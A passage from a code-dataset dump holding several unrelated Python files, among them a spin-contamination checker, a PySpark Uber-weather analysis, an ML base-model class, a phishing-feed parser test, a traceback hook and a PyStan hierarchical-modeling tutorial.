lambdas.\n\nmax_fin_diff = 0.02 # The maximal lambda value used for finite differences.\n\n\n### SCRIPT ###\n\nos.chdir(os.path.dirname(os.path.abspath(__file__)))\n\ndef get_files(path, expression, recursive=True):\n \"\"\"Returns paths to all files in a given directory that matches a provided\n expression in the file name. Commonly used to find all files of a certain\n type, e.g. output or xyz files.\n \n Parameters\n ----------\n path : :obj:`str`\n Specifies the directory to search.\n expression : :obj:`str`\n Expression to be tested against all file names in 'path'.\n recursive :obj:`bool`, optional\n Recursively find all files in all subdirectories.\n \n Returns\n -------\n :obj:`list` [:obj:`str`]\n All absolute paths to files matching the provided expression.\n \"\"\"\n if path[-1] != '/':\n path += '/'\n if recursive:\n all_files = []\n for (dirpath, _, filenames) in os.walk(path):\n index = 0\n while index < len(filenames):\n if dirpath[-1] != '/':\n dirpath += '/'\n filenames[index] = dirpath + filenames[index]\n index += 1\n all_files.extend(filenames)\n files = []\n for f in all_files:\n if expression in f:\n files.append(f)\n else:\n files = []\n for f in os.listdir(path):\n filename = os.path.basename(f)\n if expression in filename:\n files.append(path + f)\n return files\n\ndef read_json(json_path):\n \"\"\"Read JSON file.\n \n Parameters\n ----------\n json_path : :obj:`str`\n Path to json file.\n \n Returns\n -------\n :obj:`dict`\n Contents of JSON file.\n \"\"\"\n with open(json_path, 'r') as reader:\n json_dict = json.load(reader)\n \n return json_dict\n\n\n\n\ndef main():\n \n # Finds all QCJSON files in data directory.\n all_output_paths = get_files(data_dir, '.json', recursive=True)\n high_spin_contam_labels = []\n high_spin_errors = []\n lambda_high_spin_errors = []\n n_unrestricted = 0\n\n # Loops through all QCJSON files and adds QATS information.\n for json_path in all_output_paths:\n json_dict = read_json(json_path)\n multiplicity = json_dict['molecular_multiplicity']\n spin_expected = ((multiplicity - 1)/2)\n\n # Selecting which lambda values to check\n l_values = json_dict['qa_lambdas']\n bool_idx = [True for _ in l_values] # Initial values\n if only_fin_diff_lambdas:\n for i in range(len(l_values)):\n if abs(l_values[i]) <= max_fin_diff:\n bool_idx[i] = True\n else:\n bool_idx[i] = False\n if only_int_lambdas:\n for i in range(len(l_values)):\n if l_values[i].is_integer():\n bool_idx[i] = True\n else:\n if not abs(l_values[i]) <= max_fin_diff and only_fin_diff_lambdas:\n bool_idx[i] = False\n \n if 'scf_spin_squared' in json_dict.keys():\n n_unrestricted += 1\n if 'cc_spin_squared' in json_dict.keys():\n spin_squared_observed = np.array(json_dict['cc_spin_squared'])[bool_idx]\n else:\n spin_squared_observed = np.array(json_dict['scf_spin_squared'])[bool_idx]\n spin_error = np.array(\n [calc_spin(i) - spin_expected for i in spin_squared_observed if i is not None]\n )\n if np.any(spin_error[spin_error>spin_deviation]):\n if only_filename:\n json_name = json_path.split('/')[-1]\n else:\n json_name = json_path\n high_spin_contam_labels.append(json_name)\n\n bool_idx_high_spin_error = [True if i > spin_deviation else False for i in spin_error]\n high_spin_errors.append(spin_error[bool_idx_high_spin_error])\n lambda_high_spin_errors.append(np.array(l_values)[bool_idx][bool_idx_high_spin_error])\n \n\n \n print(f'The following calculations had high spin contamination (above {spin_deviation}):\\n')\n for json_name,high_spin_error,high_l_values in zip(high_spin_contam_labels, high_spin_errors, lambda_high_spin_errors):\n print(json_name)\n print(f'Lambda values: {high_l_values}')\n print(f'Spin errors: {high_spin_error} out of {len(spin_error)}')\n print()\n print(f'\\n{len(high_spin_errors)} calcs have high spin contamination out of {n_unrestricted} calcs.')\n \n \n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/check-spin-contam-json.py","file_name":"check-spin-contam-json.py","file_ext":"py","file_size_in_byte":6403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"189089595","text":"\n\nweather = sc.textFile(\"uber_weather.csv\")\n\nweather = weather.filter(lambda x: x!= 'datetime,lat,lng,base,humidity,wind,temp,description')\n\n\ndef clean_weather(line):\n return line.split(\",\")\n\nweather_clean = weather.map(clean_weather)\n\nfrom datetime import date\nimport datetime\nfrom dateutil import parser\n\ndef fix_time(line):\n return(parser.parse(line[0]), line[1], line[2], line[3], line[4], line[5], line[6], line[7])\n\nweather = weather_clean.map(fix_time)\n\ndef adddays(line):\n return line[0], line[0].day, line[0].month, line[1], line[2], line[3], line[4], line[5], line[6], line[7]\n\nweather_days = weather.map(adddays)\n\n\ndef rain(line):\n if line[9] == \"scattered clouds\" or line[9] == \"sky is clear\" or line[9] == \"broken clouds\" or line[9] == \"haze\" or line[9] == \"few clouds\" or line[9] == \"overcast clouds\" or line[9] == \"mist\" or line[9] == \"fog\" or line[9] == \"dust\" or line[9] == \"smoke\":\n dummy = \"no rain\"\n else:\n dummy = \"rain\"\n return line[0], line[1], line[2], line[3], line[4], line[5], line[6], line[7], line[8], line[9], dummy\n\n\nweather_days_rain = weather_days.map(rain)\n\ndef floater(line):\n return line[0], line[1], line[2], line[3], line[4], line[5], line[6], line[7], float(line[8]), line[9], line[10] \n\n\nweather1 = weather_days_rain.map(floater)\n\n##############################################\n\nimport pandas as pd\nfrom shapely.geometry import Point, Polygon\nimport geopandas as gpd\nimport fiona as fiona\n\n#getting lat and long in proper format\ndef latlong(line):\n new = float(line[4]), float(line[3])\n return line[0], line[1], line[2], line[3], line[4], line[5], line[6], line[7], float(line[8]), line[9], line[10], new\n\nlatlong = weather1.map(latlong)\n\ndef point(line):\n poly = gpd.GeoDataFrame.from_file('geo_export_b697b323-ce5d-4268-8623-7712a657fd85.shp')\n point = Point(line[11])\n if poly.contains(point)[0] == True:\n boro = \"Bronx\"\n if poly.contains(point)[1] == True:\n boro = \"Staten Island\"\n if poly.contains(point)[2] == True:\n boro = \"Brooklyn\"\n if poly.contains(point)[3] == True:\n boro = \"Queens\"\n if poly.contains(point)[4] == True:\n boro = \"Manhattan\"\n else:\n boro = \"Other\"\n return line[0], line[1], line[2], line[3], line[4], line[5], line[6], line[7], line[8], line[9], line[10],line[11], boro\n\nlatlongagain = latlong.map(point)\n\n##############################################\n\n\nweather_df = latlongagain.toDF()\n\n\nweather_df = weather_df.selectExpr(\"_1 as datetime1\", \"_2 as day\", \"_3 as month\", \"_4 as lat\", \"_5 as lng\", \"_6 as base\", \"_7 as humidity\", \"_8 as wind\", \"_9 as temp\", \"_10 as desc\", \"_11 as rain\", \"_12 as latlng\", \"_13 as borough\")\nweather_df.show(5)\n\n\nweather_df.createOrReplaceTempView(\"uber2014\")\n\nbor_rain = sqlContext.sql(\"select borough, day, month, rain, count(rain) number_trips from uber2014 group by day, month, borough, rain order by day desc\")\ntest = sqlContext.sql(\"select day, month, rain, count(rain) number_trips from uber2014 group by day, month, rain order by day desc\")\ntest.createOrReplaceTempView(\"counttrips\")\nbor_rain.createOrReplaceTempView(\"counttrips_borough\")\n\naverage_trips_per_day = sqlContext.sql(\"select mean(number_trips) mean_num_trips from counttrips\")\naverage_trips_per_day_with_rain = sqlContext.sql(\"select rain, mean(number_trips) mean_num_trips from counttrips group by rain\")\naverage_trips_per_month_with_rain = sqlContext.sql(\"select month, rain, mean(number_trips) mean_num_trips from counttrips group by month, rain order by month desc\")\n\naverage_trips_per_month_with_rain.show(5)\n\n\n\n\n\n","sub_path":"weather_time_cleaned.py","file_name":"weather_time_cleaned.py","file_ext":"py","file_size_in_byte":3615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"539325658","text":"import logging\nimport os\nfrom configuration import model_dir\nimport joblib\nimport datetime as dt\nfrom src.utils.base_model import load_model\nimport shap\nimport numpy as np\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn.metrics import accuracy_score\n\nlogger = logging.getLogger('XGBoostModel')\n\nclass Model:\n \"\"\"Anything that can be used by all models goes in this class\"\"\"\n def __init__(self):\n self.params = None\n self.trained_model = None\n self.model_type = None\n self.model_id = None\n self.param_grid = None\n self.model_object = None\n self.performance_metrics = [accuracy_score]\n self.scoring = 'accuracy'\n\n def get_data(self, X):\n \"\"\"Get model features, given a DataFrame of match info\"\"\"\n pass\n\n def train_model(self, X, y):\n pass\n\n def optimise_hyperparams(self, X, y, param_grid=None):\n \"\"\"Hyperparameter optimisation function using GridSearchCV. Works for any sklearn models\"\"\"\n logger.info(\"Optimising hyper-parameters\")\n param_grid = self.param_grid if param_grid is None else param_grid\n # Split data into train and test\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)\n model = self.model_object()\n clf = GridSearchCV(model, param_grid, verbose=1, scoring=self.scoring, n_jobs=1)\n clf.fit(X_train, y_train)\n # Train a second model using the default parameters\n clf2 = self.model_object(params=self.params)\n clf2.fit(X_train, y_train)\n # Compare these params to existing params. If they are better, use them.\n # Use the first listed performance metric\n performance_metric = self.performance_metrics[0]\n # Get predictions for the first classifier\n clf_predictions = clf.best_estimator_.predict(X_test)\n clf_performance = performance_metric(y_test, clf_predictions)\n # Get predictions for the second classifierr\n clf2_predictions = clf2.predict(X_test)\n clf2_performance = performance_metric(y_test, clf2_predictions)\n # Compare performance\n if clf2_performance > clf_performance:\n logger.info(\"Hyper-parameter optimisation improves on previous model, \"\n \"saving hyperparameters.\")\n self.params = clf.best_params_\n\n def predict(self, X):\n X = self.preprocess(X)\n return self.trained_model.predict_proba(X) if self.trained_model is not None else None\n\n def preprocess(self, X):\n \"\"\"Apply preprocessing steps to data\"\"\"\n return np.array(X)\n\n def get_training_data(self):\n pass\n\n def save_model(self):\n if self.trained_model is None:\n logger.error(\"Trying to save a model that is None, aborting.\")\n else:\n # Save the model ID inside the model object (so we know which\n # model made which predictions in the DB)\n self.trained_model.model_id = self.model_id\n file_name = self.model_type + '_' + str(dt.datetime.today().date()) + '.joblib'\n save_dir = os.path.join(model_dir, file_name)\n logger.info(\"Saving model to {} with joblib.\".format(save_dir))\n joblib.dump(self.trained_model, open(save_dir, \"wb\"))\n\n def load_model(self, model_type, date=None):\n \"\"\"Wrapper for the load model function in utils\"\"\"\n model = load_model(model_type, date=date)\n if model is None:\n return False\n else:\n # Set the attributes of the model to those of the class\n self.trained_model = model\n self.model_id = self.trained_model.model_id\n self.params = model.get_params()\n return True\n\n @staticmethod\n def get_categorical_features(X):\n \"\"\"Get a list of categorical features in the data\"\"\"\n categoricals = []\n for col, col_type in X.dtypes.iteritems():\n if col_type == 'O':\n categoricals.append(col)\n return categoricals\n\n @staticmethod\n def fill_na_values(self, X):\n \"\"\"Fill NA values in the data\"\"\"\n # ToDo: Add a data structure that specifies how to fill NA's for every column\n pass\n\n @staticmethod\n def get_shap_explainer(model, X, plot_force=False):\n \"\"\"Explain model predictions using SHAP\"\"\"\n explainer = shap.TreeExplainer(model)\n shap_values = explainer.shap_values(X)\n # visualize the first prediction's explanation\n # (use matplotlib=True to avoid Javascript)\n if plot_force:\n shap.force_plot(explainer.expected_value[0], shap_values[0])\n return explainer, shap_values\n","sub_path":"src/models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":4711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"82465466","text":"\"\"\"unittests for analytics.filters.email\"\"\"\n\nimport builtins\nimport pdb\nimport json\nfrom pprint import pprint\nimport unittest\n\nfrom tahoe.tests.identity.test_backend import setUpBackend, tearDownBackend\n\nif __name__ != 'analytics.tests.filters.test_phishtank_feed':\n import sys, os\n J = os.path.join\n sys.path = ['..', J('..','..'), J('..','..','..')] + sys.path\n del sys, os\n\nfrom filters import set_filter_backend, PhishTankFeed\n\n\ndef make_test_data():\n with open('openphish_feed.txt', 'r') as fp:\n builtins.data_str = fp.read()\n\n builtins.orgid = 'ABC123'\n builtins.timezone = 'US/Pacific'\n\ndef delete_test_data():\n del builtins.data_str, builtins.orgid, builtins.timezone\n\n\ndef setUpModule():\n builtins._backend = setUpBackend()\n set_filter_backend(_backend)\n \n\ndef tearDownModule():\n tearDownBackend(_backend)\n del builtins._backend\n\n\nclass CowireTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n _backend.drop()\n make_test_data()\n\n @classmethod\n def tearDownClass(cls):\n delete_test_data()\n\n def test_01(self):\n lines = data_str.split('\\n')\n c = PhishTankFeed()\n d = json.dumps({'data': data_str})\n raw_ref = c.parse(d, orgid, timezone)\n \n if raw_ref == False:\n return\n\n e = _backend.find_one({'itype':'event', '_hash':{'$in':raw_ref}})\n pprint(e)\n pdb.set_trace()\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/filters/test_phishtank_feed.py","file_name":"test_phishtank_feed.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"523161203","text":"import os\r\nimport sys\r\nfrom typing import NoReturn\r\n\r\nfrom traceback_with_variables.core import iter_tb_lines\r\n\r\n\r\ndef override_print_tb(\r\n max_value_str_len: int = 1000,\r\n max_exc_str_len: int = 10000,\r\n ellipsis_: str = '...',\r\n num_context_lines: int = 1,\r\n activate_by_env_var: str = '',\r\n deactivate_by_env_var: str = '',\r\n) -> NoReturn:\r\n if (activate_by_env_var and not os.getenv(activate_by_env_var, '')) or \\\r\n (deactivate_by_env_var and os.getenv(deactivate_by_env_var, '')):\r\n return sys.excepthook\r\n\r\n def excepthook(\r\n e_cls, # noqa\r\n e,\r\n tb\r\n ):\r\n for line in iter_tb_lines(\r\n e=e,\r\n tb=tb,\r\n num_context_lines=num_context_lines,\r\n max_value_str_len=max_value_str_len,\r\n max_exc_str_len=max_exc_str_len,\r\n ellipsis_=ellipsis_,\r\n ):\r\n sys.stderr.write(line)\r\n sys.stderr.write('\\n')\r\n\r\n sys.stderr.flush()\r\n\r\n sys.excepthook = excepthook\r\n","sub_path":"traceback_with_variables/override.py","file_name":"override.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"364874625","text":"from Data.parameters import Data\nfrom keycloak_funcs import keyData\nfrom reuse_func import GetData\nfrom selenium import webdriver\n\n\nclass CqubeAdminSetting():\n def __init__(self,driver,file):\n self.driver=driver\n self.file=file\n\n def check_cqube_admin_setting(self):\n cal = keyData()\n cal.navigate_to_clients(self.driver)\n json_cqube_admin_client=cal.check_clients(self.file,'cqube_admin')\n cal.click_on_cqube_admin(self.driver)\n cal.click_on_settings(self.driver)\n keycloack_cqube_admin_client=cal.check_setting(self.driver)\n cal.click_on_client_scopes(self.driver)\n return json_cqube_admin_client,keycloack_cqube_admin_client\n","sub_path":"KeyCloak/Clients/check_cqube_admin_settings.py","file_name":"check_cqube_admin_settings.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"407477236","text":"import pystan\n\n#random linear treatment effects with known variance\nschools_code = \"\"\"\ndata { //this block defines the data that the user inputs\n int J; // number of schools\n vector[J] y; // estimated treatment effects\n vector[J] sigma; // s.e. of effect estimates\n}\nparameters { //this block defines the parameters we want to trace\n real mu;\n real tau;\n vector[J] eta;\n}\ntransformed parameters { //this block is used for parameters that are defined through other parameters or data\n vector[J] theta;\n theta = mu + tau * eta;\n}\nmodel { //this is where we set up the distributions\n eta ~ normal(0, 1);\n y ~ normal(theta, sigma);\n}\n\"\"\"\n\nschools_dat = {'J': 8,\n 'y': [28, 8, -3, 7, -1, 1, 18, 12],\n 'sigma': [15, 10, 16, 11, 9, 11, 10, 18]}\n\nsm = pystan.StanModel(model_code=schools_code)\nfit = sm.sampling(data=schools_dat, iter=1000, chains=4, seed = 1954989094)\n\nfit\nfit.plot()\nfit.extract()\nfit.extract('theta')\n\n#from a file\nsm = pystan.StanModel(file = 'KocPython2020/in-classMaterial/day11/8schools.stan')\n\n#useful additional arguments: n_jobs and control\nfit2 = sm.sampling(data=schools_dat, iter=1000, chains=4, seed = 1954989094, n_jobs=1, control = {'adapt_delta':.9, 'stepsize':20, 'max_treedepth':20})\n\n#control has the following possible parameters (the above three are the most important)\n\n# adapt_engaged : bool\n# adapt_gamma : float, positive, default 0.05\n# adapt_delta : float, between 0 and 1, default 0.8\n# adapt_kappa : float, between default 0.75\n# adapt_t0 : float, positive, default 10\n# adapt_init_buffer : int, positive, defaults to 75\n# adapt_term_buffer : int, positive, defaults to 50\n# adapt_window : int, positive, defaults to 25\n# stepsize: float, positive\n# stepsize_jitter: float, between 0 and 1\n# metric : str, {“unit_e”, “diag_e”, “dense_e”}\n# max_treedepth : int, positive\n\n\n\"\"\"\nExample of running emcee to fit the parameters of a straight line.\n\"\"\"\n\nfrom __future__ import print_function, division\n\nimport os\nimport sys\nimport numpy as np\n\nimport matplotlib as mpl\n\n# import PyStan\nimport pystan\n\nos.chdir('KocPython2020/in-classMaterial/day11')\n\n# import model and data\nfrom createdata import *\n\n# Create model code\nline_code = \"\"\"\ndata {{\n int N; // number of data points\n real y[N]; // observed data points\n real x[N]; // abscissa points\n real sigma; // standard deviation\n}}\nparameters {{\n // parameters for the fit\n real m;\n real c;\n}}\ntransformed parameters {{\n real theta[N];\n for (j in 1:N)\n theta[j] = m * x[j] + c; // straight line model\n}}\nmodel {{\n m ~ normal({mmu}, {msigma}); // prior on m (gradient)\n c ~ uniform({clower}, {cupper}); // prior on c (y-intercept)\n y ~ normal(theta, sigma); // likelihood of the data given the model\n}}\n\"\"\"\n\n# set the data and the abscissa\nlinear_data = {'N': M, # number of data points\n 'y': data, # observed data (converted from numpy array to a list)\n 'x': x, # abscissa points (converted from numpy array to a list)\n 'sigma': sigma} # standard deviation\n\nNsamples = 1000 # set the number of iterations of the sampler\nchains = 4 # set the number of chains to run with\n\n# dictionary for inputs into line_code (this type of setting up priors is unnecessary, but thought you should know it exists)\nlinedict = {}\nlinedict['mmu'] = 0.0 # mean of Gaussian prior distribution for m\nlinedict['msigma'] = 10 # standard deviation of Gaussian prior distribution for m\nlinedict['clower'] = -10 # lower bound on uniform prior distribution for c\nlinedict['cupper'] = 10 # upper bound on uniform prior distribution for c\n\nsm = pystan.StanModel(model_code=line_code.format(**linedict)); # compile model\nfit3 = sm.sampling(data=linear_data, iter=Nsamples, chains=chains); # perform sampling\n\nla = fit3.extract(permuted=True) # return a dictionary of arrays\n\n# extract the samples\npostsamples = np.vstack((la['m'], la['c'])).T\n\n# plot posterior samples (if corner.py is installed)\ntry:\n import corner # import corner.py\nexcept ImportError:\n sys.exit(1)\n\nprint('Number of posterior samples is {}'.format(postsamples.shape[0]))\n\nfig = corner.corner(postsamples, labels=[r\"$m$\", r\"$c$\"], truths=[m, c])\n\n\n#TODO: Write a logit model that takes one continuous explanatory variable for a binary outcome. Then run it on the voting turnout data in turnout.csv (the outcome is whether or not they voted, vote, and the explanatory variable is income)\n\n\n#TODO: Change the model to be a probit model and compare the results to the logit. Why would the estimates be different?\n\n\n#TODO: Generalize the logit model to take K predictors. Include age, educate, and income as predictors.\n\n\n\n\n#hierarchical modeling\n\n#Hierarchical or multilevel modeling is a generalization of regression modeling.\n\n#Multilevel models are regression models in which the constituent model parameters are given probability models. This implies that model parameters are allowed to vary by group.\n\n#Observational units are often naturally clustered. Clustering induces dependence between observations, despite random sampling of clusters and random sampling within clusters.\n\n#A hierarchical model is a particular multilevel model where parameters are nested within one another.\n\n#Some multilevel structures are not hierarchical.\n\n# e.g. \"country\" and \"year\" are not nested, but may represent separate, but overlapping, clusters of parameters\n\n#We will motivate this topic using an environmental epidemiology example.\n\n#Example: Radon contamination (Gelman and Hill 2006)\n\n#Radon is a radioactive gas that enters homes through contact points with the ground. It is a carcinogen that is the primary cause of lung cancer in non-smokers. Radon levels vary greatly from household to household.\n\n#radon\n\n#The EPA did a study of radon levels in 80,000 houses. Two important predictors:\n\n# measurement in basement or first floor (radon higher in basements)\n# county uranium level (positive correlation with radon levels)\n\n#We will focus on modeling radon levels in Minnesota.\n\n#The hierarchy in this example is households within county.\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# Import radon data\nsrrs2 = pd.read_csv('srrs2.dat')\nsrrs2.columns = srrs2.columns.map(str.strip)\nsrrs_mn = srrs2.assign(fips=srrs2.stfips*1000 + srrs2.cntyfips)[srrs2.state=='MN']\n# Next, obtain the county-level predictor, uranium, by combining two variables.\ncty = pd.read_csv('cty.dat')\ncty_mn = cty[cty.st=='MN'].copy()\ncty_mn[ 'fips'] = 1000*cty_mn.stfips + cty_mn.ctfips\n# Use the merge method to combine home- and county-level information in a single DataFrame.\nsrrs_mn = srrs_mn.merge(cty_mn[['fips', 'Uppm']], on='fips')\nsrrs_mn = srrs_mn.drop_duplicates(subset='idnum')\nu = np.log(srrs_mn.Uppm)\nn = len(srrs_mn)\n\nsrrs_mn.head()\n\n# We also need a lookup table (dict) for each unique county, for indexing.\nsrrs_mn.county = srrs_mn.county.str.strip()\nmn_counties = srrs_mn.county.unique()\ncounties = len(mn_counties)\n\n# Finally, create local copies of variables.\ncounty_lookup = dict(zip(mn_counties, range(len(mn_counties))))\ncounty = srrs_mn['county_code'] = srrs_mn.county.replace(county_lookup).values\nradon = srrs_mn.activity\nsrrs_mn['log_radon'] = log_radon = np.log(radon + 0.1).values\nfloor_measure = srrs_mn.floor.values\n# Distribution of radon levels in MN (log scale):\nsrrs_mn.activity.apply(lambda x: np.log(x+0.1)).hist(bins=25)\n\n#Conventional approaches\n\n#The two conventional alternatives to modeling radon exposure represent the two extremes of the bias-variance tradeoff:\n\n#Complete pooling:\n\n#Treat all counties the same, and estimate a single radon level.\n#yi=α+βxi+ϵi\n\n#No pooling:\n\n#Model radon in each county independently.\n#yi=αj[i]+βxi+ϵi\n\n#where j=1,…,85\n\n#The errors ϵi may represent measurement error, temporal within-house variation, or variation among houses.\n\n#To specify this model in Stan, we begin by constructing the data block, which includes vectors of log-radon measurements (y) and floor measurement covariates (x), as well as the number of samples (N).\n\npooled_data = \"\"\"\ndata {\n int N; \n vector[N] x;\n vector[N] y;\n}\n\"\"\"\n\n#Next we initialize our parameters, which in this case are the linear model coefficients and the normal scale parameter. Notice that sigma is constrained to be positive\n\npooled_parameters = \"\"\"\nparameters {\n vector[2] beta;\n real sigma;\n} \n\"\"\"\n\n#Finally, we model the log-radon measurements as a normal sample with a mean that is a function of the floor measurement.\n\npooled_model = \"\"\"\nmodel {\n y ~ normal(beta[1] + beta[2] * x, sigma);\n}\n\"\"\"\n\n#We then pass the code, data, and parameters to the stan function. The sampling requires specifying how many iterations we want, and how many parallel chains to sample. Here, we will sample 2 chains of length 1000.\n\npooled_data_dict = {'N': len(log_radon),\n 'x': floor_measure,\n 'y': log_radon}\n#notice we did not compile the model first --- either is fine\npooled_fit = pystan.stan(model_code=pooled_data + pooled_parameters + pooled_model, data=pooled_data_dict, iter=1000, chains=2)\n \n#The sample can be extracted for plotting and summarization.\n\npooled_sample = pooled_fit.extract(permuted=True)\n\nb0, m0 = pooled_sample['beta'].T.mean(1)\n\nplt.scatter(srrs_mn.floor, np.log(srrs_mn.activity+0.1))\nxvals = np.linspace(-0.2, 1.2)\nplt.plot(xvals, m0*xvals+b0, 'r--')\n\n#At the other end of the extreme, we can fit separate (independent) means for each county. The only things that are shared in this model are the coefficient for the basement measurement effect, and the standard deviation of the error.\n\nunpooled_model = \"\"\"data {\n int N; \n int county[N];\n vector[N] x;\n vector[N] y;\n} \nparameters {\n vector[85] a;\n real beta;\n real sigma;\n} \ntransformed parameters {\n vector[N] y_hat;\n\n for (i in 1:N)\n y_hat[i] = beta * x[i] + a[county[i]];\n}\nmodel {\n y ~ normal(y_hat, sigma);\n}\"\"\"\n\nunpooled_data = {'N': len(log_radon),\n 'county': county+1, # Stan counts starting at 1\n 'x': floor_measure,\n 'y': log_radon}\n\nunpooled_fit = pystan.stan(model_code=unpooled_model, data=unpooled_data, iter=1000, chains=2)\n\nunpooled_estimates = pd.Series(unpooled_fit['a'].mean(0), index=mn_counties)\nunpooled_se = pd.Series(unpooled_fit['a'].std(0), index=mn_counties)\n\n#We can plot the ordered estimates to identify counties with high radon levels:\n\norder = unpooled_estimates.sort_values().index\n\nplt.scatter(range(len(unpooled_estimates)), unpooled_estimates[order])\nfor i, m, se in zip(range(len(unpooled_estimates)), unpooled_estimates[order], unpooled_se[order]):\n plt.plot([i,i], [m-se, m+se], 'b-')\nplt.xlim(-1,86); plt.ylim(-1,4)\nplt.ylabel('Radon estimate');plt.xlabel('Ordered county');\n\n#Here are visual comparisons between the pooled and unpooled estimates for a subset of counties representing a range of sample sizes.\n\nsample_counties = ('LAC QUI PARLE', 'AITKIN', 'KOOCHICHING', \n 'DOUGLAS', 'CLAY', 'STEARNS', 'RAMSEY', 'ST LOUIS')\n\nfig, axes = plt.subplots(2, 4, figsize=(12, 6), sharey=True, sharex=True)\naxes = axes.ravel()\nm = unpooled_fit['beta'].mean(0)\nfor i,c in enumerate(sample_counties):\n y = srrs_mn.log_radon[srrs_mn.county==c]\n x = srrs_mn.floor[srrs_mn.county==c]\n axes[i].scatter(x + np.random.randn(len(x))*0.01, y, alpha=0.4)\n \n # No pooling model\n b = unpooled_estimates[c]\n \n # Plot both models and data\n xvals = np.linspace(-0.2, 1.2)\n axes[i].plot(xvals, m*xvals+b)\n axes[i].plot(xvals, m0*xvals+b0, 'r--')\n axes[i].set_xticks([0,1])\n axes[i].set_xticklabels(['basement', 'floor'])\n axes[i].set_ylim(-1, 3)\n axes[i].set_title(c)\n if not i%2:\n axes[i].set_ylabel('log radon level')\n \n#Neither of these models are satisfactory:\n# if we are trying to identify high-radon counties, pooling is useless\n# we do not trust extreme unpooled estimates produced by models using few observations\n\n#Multilevel and hierarchical models\n\n#When we pool our data, we imply that they are sampled from the same model. This ignores any variation among sampling units (other than sampling variance)\n\n#When we analyze data unpooled, we imply that they are sampled independently from separate models. At the opposite extreme from the pooled case, this approach claims that differences between sampling units are to large to combine them\n\n#In a hierarchical model, parameters are viewed as a sample from a population distribution of parameters. Thus, we view them as being neither entirely different or exactly the same. This is parital pooling.\n\n#We can use PyStan to easily specify multilevel models, and fit them using Hamiltonian Monte Carlo.\n\n# Estimates for counties with smaller sample sizes will shrink towards the state-wide average.\n# Estimates for counties with larger sample sizes will be closer to the unpooled county estimates.\n\npartial_pooling = \"\"\"\ndata {\n int N; \n int county[N];\n vector[N] y;\n} \nparameters {\n vector[85] a;\n real mu_a;\n real sigma_a;\n real sigma_y;\n} \ntransformed parameters {\n vector[N] y_hat;\n for (i in 1:N)\n y_hat[i] = a[county[i]];\n}\nmodel {\n mu_a ~ normal(0, 1);\n a ~ normal (10 * mu_a, sigma_a);\n\n y ~ normal(y_hat, sigma_y);\n}\"\"\"\n\n#Notice now we have two standard deviations, one describing the residual error of the observations, and another the variability of the county means around the average.\n\npartial_pool_data = {'N': len(log_radon),\n 'county': county+1, # Stan counts starting at 1\n 'y': log_radon}\n\npartial_pool_fit = pystan.stan(model_code=partial_pooling, data=partial_pool_data, iter=1000, chains=2)\n\nsample_trace = partial_pool_fit['a']\n\nfig, axes = plt.subplots(1, 2, figsize=(14,6), sharex=True, sharey=True)\nsamples, counties = sample_trace.shape\njitter = np.random.normal(scale=0.1, size=counties)\n\nn_county = srrs_mn.groupby('county')['idnum'].count()\nunpooled_means = srrs_mn.groupby('county')['log_radon'].mean()\nunpooled_sd = srrs_mn.groupby('county')['log_radon'].std()\nunpooled = pd.DataFrame({'n':n_county, 'm':unpooled_means, 'sd':unpooled_sd})\nunpooled['se'] = unpooled.sd/np.sqrt(unpooled.n)\n\naxes[0].plot(unpooled.n + jitter, unpooled.m, 'b.')\nfor j, row in zip(jitter, unpooled.iterrows()):\n name, dat = row\n axes[0].plot([dat.n+j,dat.n+j], [dat.m-dat.se, dat.m+dat.se], 'b-')\naxes[0].set_xscale('log')\naxes[0].hlines(sample_trace.mean(), 0.9, 100, linestyles='--')\n\n \nsamples, counties = sample_trace.shape\nmeans = sample_trace.mean(axis=0)\nsd = sample_trace.std(axis=0)\naxes[1].scatter(n_county.values + jitter, means)\naxes[1].set_xscale('log')\naxes[1].set_xlim(1,100)\naxes[1].set_ylim(0, 3)\naxes[1].hlines(sample_trace.mean(), 0.9, 100, linestyles='--')\nfor j,n,m,s in zip(jitter, n_county.values, means, sd):\n axes[1].plot([n+j]*2, [m-s, m+s], 'b-')\n\n#Notice the difference between the unpooled and partially-pooled estimates, particularly at smaller sample sizes. The former are both more extreme and more imprecise.\n\n#Varying intercept model\n\n#This model allows intercepts to vary across county, according to a random effect.\n#yi=αj[i]+βxi+ϵi\n\n#where\n#ϵi∼N(0,σ2y)\n\n#and the intercept random effect:\n#αj[i]∼N(μα,σ2α)\n\n#As with the the “no-pooling” model, we set a separate intercept for each county, but rather than fitting separate least squares regression models for each county, multilevel modeling shares strength among counties, allowing for more reasonable inference in counties with little data.\n\nvarying_intercept = \"\"\"\ndata {\n int J; \n int N; \n int county[N];\n vector[N] x;\n vector[N] y;\n} \nparameters {\n vector[J] a;\n real b;\n real mu_a;\n real sigma_a;\n real sigma_y;\n} \ntransformed parameters {\n\n vector[N] y_hat;\n\n for (i in 1:N)\n y_hat[i] = a[county[i]] + x[i] * b;\n}\nmodel {\n sigma_a ~ uniform(0, 100);\n a ~ normal (mu_a, sigma_a);\n\n b ~ normal (0, 1);\n\n sigma_y ~ uniform(0, 100);\n y ~ normal(y_hat, sigma_y);\n}\n\"\"\"\n\nvarying_intercept_data = {'N': len(log_radon),\n 'J': len(n_county),\n 'county': county+1, # Stan counts starting at 1\n 'x': floor_measure,\n 'y': log_radon}\n\nvarying_intercept_fit = pystan.stan(model_code=varying_intercept, data=varying_intercept_data, iter=1000, chains=2)\n\na_sample = pd.DataFrame(varying_intercept_fit['a'])\n\nimport seaborn as sns\nsns.set(style=\"ticks\", 